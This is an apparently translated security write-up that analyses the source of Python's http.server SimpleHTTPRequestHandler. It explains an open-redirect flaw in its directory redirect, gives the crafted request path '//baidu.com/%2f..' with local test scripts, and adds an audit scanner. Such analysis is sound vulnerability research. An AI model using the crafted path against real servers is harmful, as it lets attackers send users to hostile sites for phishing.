Source Code Analysis
As is well known, Python can start a web server with a single command:
python3 -m http.server port
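Running this command in any directory starts a web file server rooted in that directory. It relies on the http.server module, which contains the following important classes:
- HTTPServer: inherits from socketserver.TCPServer, which shows that an HTTP server is essentially a TCP server.
- BaseHTTPRequestHandler: a handler that processes the content of the TCP stream. It parses the data read from the stream according to the HTTP protocol and sends responses back in HTTP format. On its own, however, it does nothing with a parsed request, so it cannot be used directly. To write your own web application, subclass it and implement methods such as do_XXX.
- SimpleHTTPRequestHandler: inherits from BaseHTTPRequestHandler, takes the parsed request from its parent class, and returns the file at the requested path, which amounts to a static file server.
- CGIHTTPRequestHandler: inherits from SimpleHTTPRequestHandler and adds the ability to execute CGI scripts on top of the static file server.
In short, the relationship looks like this: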
+-----------+          +------------------------+
| TCPServer |          | BaseHTTPRequestHandler |
+-----------+          +------------------------+
      ^                            |
      |                            v
      |                +--------------------------+
      +----------------| SimpleHTTPRequestHandler |
      |                +--------------------------+
      |                            |
      |                            v
      |                 +-----------------------+
      +-----------------| CGIHTTPRequestHandler |
                        +-----------------------+
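As a minimal sketch of the do_XXX approach described above, the following handler subclasses BaseHTTPRequestHandler and answers GET requests with a fixed text body. The names HelloHandler and fetch_once, and the response text, are illustrative assumptions and not part of http.server.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class HelloHandler(BaseHTTPRequestHandler):
    """Hypothetical handler: the base class parses the request, we only reply."""

    def do_GET(self):
        body = ("you asked for " + self.path).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the example quiet


def fetch_once(path):
    """Serve on an ephemeral loopback port, issue one GET, return the body."""
    server = HTTPServer(("127.0.0.1", 0), HelloHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection(
            "127.0.0.1", server.server_address[1], timeout=5)
        conn.request("GET", path)
        body = conn.getresponse().read().decode("utf-8")
        conn.close()
        return body
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(fetch_once("/hello"))
```

Without a do_GET method, BaseHTTPRequestHandler would answer the same request with an error response, which is why it cannot be used on its own.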
Now let's look at the source code of SimpleHTTPRequestHandler:
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):

    """Simple HTTP request handler with GET and HEAD commands.

    This serves files from the current directory and any of its
    subdirectories.  The MIME type for files is determined by
    calling the .guess_type() method.

    The GET and HEAD requests are identical except that the HEAD
    request omits the actual contents of the file.

    """

    server_version = "SimpleHTTP/" + __version__

    def __init__(self, *args, directory=None, **kwargs):
        if directory is None:
            directory = os.getcwd()
        self.directory = directory
        super().__init__(*args, **kwargs)

    def do_GET(self):
        """Serve a GET request."""
        f = self.send_head()
        if f:
            try:
                self.copyfile(f, self.wfile)
            finally:
                f.close()

    def do_HEAD(self):
        """Serve a HEAD request."""
        f = self.send_head()
        if f:
            f.close()

    def send_head(self):
        """Common code for GET and HEAD commands.

        This sends the response code and MIME headers.

        Return value is either a file object (which has to be copied
        to the outputfile by the caller unless the command was HEAD,
        and must be closed by the caller under all circumstances), or
        None, in which case the caller has nothing further to do.

        """
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            parts = urllib.parse.urlsplit(self.path)
            if not parts.path.endswith('/'):
                # redirect browser - doing basically what apache does
                self.send_response(HTTPStatus.MOVED_PERMANENTLY)
                new_parts = (parts[0], parts[1], parts[2] + '/',
                             parts[3], parts[4])
                new_url = urllib.parse.urlunsplit(new_parts)
                self.send_header("Location", new_url)
                self.end_headers()
                return None
            for index in "index.html", "index.htm":
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                return self.list_directory(path)
        ctype = self.guess_type(path)
        try:
            f = open(path, 'rb')
        except OSError:
            self.send_error(HTTPStatus.NOT_FOUND, "File not found")
            return None

        try:
            fs = os.fstat(f.fileno())
            # Use browser cache if possible
            if ("If-Modified-Since" in self.headers
                    and "If-None-Match" not in self.headers):
                # compare If-Modified-Since and time of last file modification
                try:
                    ims = email.utils.parsedate_to_datetime(
                        self.headers["If-Modified-Since"])
                except (TypeError, IndexError, OverflowError, ValueError):
                    # ignore ill-formed values
                    pass
                else:
                    if ims.tzinfo is None:
                        # obsolete format with no timezone, cf.
                        # https://tools.ietf.org/html/rfc7231#section-7.1.1.1
                        ims = ims.replace(tzinfo=datetime.timezone.utc)
                    if ims.tzinfo is datetime.timezone.utc:
                        # compare to UTC datetime of last modification
                        last_modif = datetime.datetime.fromtimestamp(
                            fs.st_mtime, datetime.timezone.utc)
                        # remove microseconds, like in If-Modified-Since
                        last_modif = last_modif.replace(microsecond=0)

                        if last_modif <= ims:
                            self.send_response(HTTPStatus.NOT_MODIFIED)
                            self.end_headers()
                            f.close()
                            return None

            self.send_response(HTTPStatus.OK)
            self.send_header("Content-type", ctype)
            self.send_header("Content-Length", str(fs[6]))
            self.send_header("Last-Modified",
                             self.date_time_string(fs.st_mtime))
            self.end_headers()
            return f
        except:
            f.close()
            raise

    ...
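We will skip the HTTP parsing that happens earlier. A GET request is dispatched to do_GET(), which calls send_head().
send_head() calls self.translate_path(self.path) to normalize the request path and determine which file the user is actually requesting. If the resulting path is an existing directory, execution enters the first if statement. If the requested path does not end with /, execution enters the second if statement, which performs an HTTP redirect. This redirect is the crux of the vulnerability.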
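The redirect branch can be replayed in isolation to see what ends up in the Location header. The sketch below copies only the urlsplit/urlunsplit steps from send_head(); the function name redirect_location is an illustrative assumption, and the function assumes the os.path.isdir() check has already passed.

```python
import urllib.parse


def redirect_location(raw_path):
    """Replay the Location computation from the directory branch of send_head().

    Assumes the translated path was already found to be a directory.
    """
    parts = urllib.parse.urlsplit(raw_path)
    if parts.path.endswith("/"):
        return None  # no redirect is issued when the path already ends with /
    new_parts = (parts[0], parts[1], parts[2] + "/", parts[3], parts[4])
    return urllib.parse.urlunsplit(new_parts)


if __name__ == "__main__":
    for raw in ("/docs", "/docs?x=1", "//baidu.com/%2f.."):
        print(repr(raw), "->", repr(redirect_location(raw)))
```

Note that urlsplit() reads the text after a leading // as a network location, so the request path //baidu.com/%2f.. is split into a host part (baidu.com) and a path part (/%2f..), and both are written back into the redirect target unchanged.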
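Reproducing the Vulnerability
In mainstream browsers such as Chrome and Firefox, a URL that begins with //domain is treated as protocol-relative: it inherits the scheme of the current request. For example, if we visit http://example.com//baidu.com/ and the server responds with a redirect to //baidu.com/, the browser goes to http://baidu.com/ rather than to the ./baidu.com/ directory on example.com. So if we send the request GET //baidu.com HTTP/1.0\r\n\r\n, we are redirected to //baidu.com/, which amounts to an open redirect (arbitrary URL redirection) vulnerability.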
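The way a //domain target is resolved can be approximated with urllib.parse.urljoin, which implements RFC 3986 reference resolution. This is only a sketch: browsers follow their own URL parsing rules, and the helper name resolve_location is an illustrative assumption.

```python
from urllib.parse import urljoin


def resolve_location(page_url, location):
    """Resolve a Location header value against the URL that was requested."""
    return urljoin(page_url, location)


if __name__ == "__main__":
    # A //host target keeps the scheme of the current page but replaces the host.
    print(resolve_location("http://example.com//baidu.com", "//baidu.com/"))
    # A single leading slash stays on the original host.
    print(resolve_location("http://example.com/a", "/baidu.com/"))
```

The contrast between the two calls is the whole issue: one extra slash at the start of the Location value moves the user to a different host.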
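Here, because the directory baidu.com does not exist, we still need to get past the if os.path.isdir(path) check. The bypass is simple: since baidu.com does not exist, we just step back up to the parent directory: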
GET //baidu.com/%2f.. HTTP/1.0\r\n\r\n
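To see why the %2f.. suffix gets past the directory check, the sketch below re-implements the core of the path normalization in simplified form: percent-decode, normalize, then join the remaining segments onto the served directory. It is an approximation written for illustration, not the library's translate_path(); the function name translate and the temporary directory are assumptions.

```python
import os
import posixpath
import tempfile
import urllib.parse


def translate(directory, raw_path):
    """Simplified stand-in for translate_path(); an approximation only."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    path = urllib.parse.unquote(path)   # %2f is decoded to /
    path = posixpath.normpath(path)     # "baidu.com//.." cancels out
    result = directory
    for word in filter(None, path.split("/")):
        if os.path.dirname(word) or word in (os.curdir, os.pardir):
            continue                    # skip anything that is not a plain name
        result = os.path.join(result, word)
    return result


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for raw in ("//baidu.com", "//baidu.com/%2f.."):
            local = translate(root, raw)
            print(raw, "->", os.path.relpath(local, root),
                  "isdir:", os.path.isdir(local))
```

With the plain //baidu.com path the result points at a nonexistent baidu.com entry, while the %2f.. variant collapses back to the served directory itself, so os.path.isdir() succeeds.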
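Let's run a simple test. Start an http.server instance in a local test directory, listening on port 1234 (python3 -m http.server 1234).
Then visit http://127.0.0.1:1234//baidu.com/%2f.. in a browser, and you will find that it is redirected to http://www.baidu.com/search/error.html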
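The same check can be scripted without a browser. The sketch below serves an empty temporary directory on an ephemeral loopback port and sends the crafted path with http.client, which does not follow redirects. The names QuietHandler and probe are illustrative assumptions. A Location value that begins with // indicates the behavior described here; on an interpreter that normalizes the leading slashes before this point, the value begins with a single slash instead.

```python
import functools
import http.client
import tempfile
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler


class QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        pass  # suppress per-request logging


def probe(raw_path="//baidu.com/%2f.."):
    """Return (status, Location) for one GET against a throwaway local server."""
    with tempfile.TemporaryDirectory() as root:
        handler = functools.partial(QuietHandler, directory=root)
        server = HTTPServer(("127.0.0.1", 0), handler)
        threading.Thread(target=server.serve_forever, daemon=True).start()
        try:
            conn = http.client.HTTPConnection(
                "127.0.0.1", server.server_address[1], timeout=5)
            conn.request("GET", raw_path)  # the path is sent exactly as given
            resp = conn.getresponse()
            resp.read()
            result = (resp.status, resp.getheader("Location"))
            conn.close()
            return result
        finally:
            server.shutdown()
            server.server_close()


if __name__ == "__main__":
    status, location = probe()
    print(status, location)
    print("open redirect:", bool(location) and location.startswith("//"))
```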
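Impact of the Vulnerability
Although this vulnerability lives in Python's core library, people do not normally run python -m http.server directly in production. Still, when auditing similar code, it is worth paying attention to request handling: check whether any handlers that implement do_GET or do_POST inherit from and use SimpleHTTPRequestHandler. If they do, follow up with further analysis to see whether the issue is exploitable.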
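One way to start such an audit is a static scan for classes that list SimpleHTTPRequestHandler as a base. The sketch below uses the standard ast module; the function name find_handler_subclasses and the sample source are illustrative assumptions, and the scan only matches direct bases by name, so indirect subclasses and aliased imports are missed.

```python
import ast

TARGET = "SimpleHTTPRequestHandler"


def _base_name(node):
    """Return the rightmost name of a base-class expression, if it has one."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return node.attr
    return None


def find_handler_subclasses(source):
    """List (class name, sorted do_* methods) for direct subclasses of TARGET."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.ClassDef):
            continue
        if any(_base_name(base) == TARGET for base in node.bases):
            methods = sorted(
                item.name for item in node.body
                if isinstance(item, ast.FunctionDef)
                and item.name.startswith("do_"))
            hits.append((node.name, methods))
    return hits


if __name__ == "__main__":
    sample = (
        "import http.server\n"
        "class UploadHandler(http.server.SimpleHTTPRequestHandler):\n"
        "    def do_POST(self):\n"
        "        pass\n"
    )
    print(find_handler_subclasses(sample))
```

Each hit is only a starting point: whether the redirect is reachable still depends on how the subclass overrides or reuses send_head().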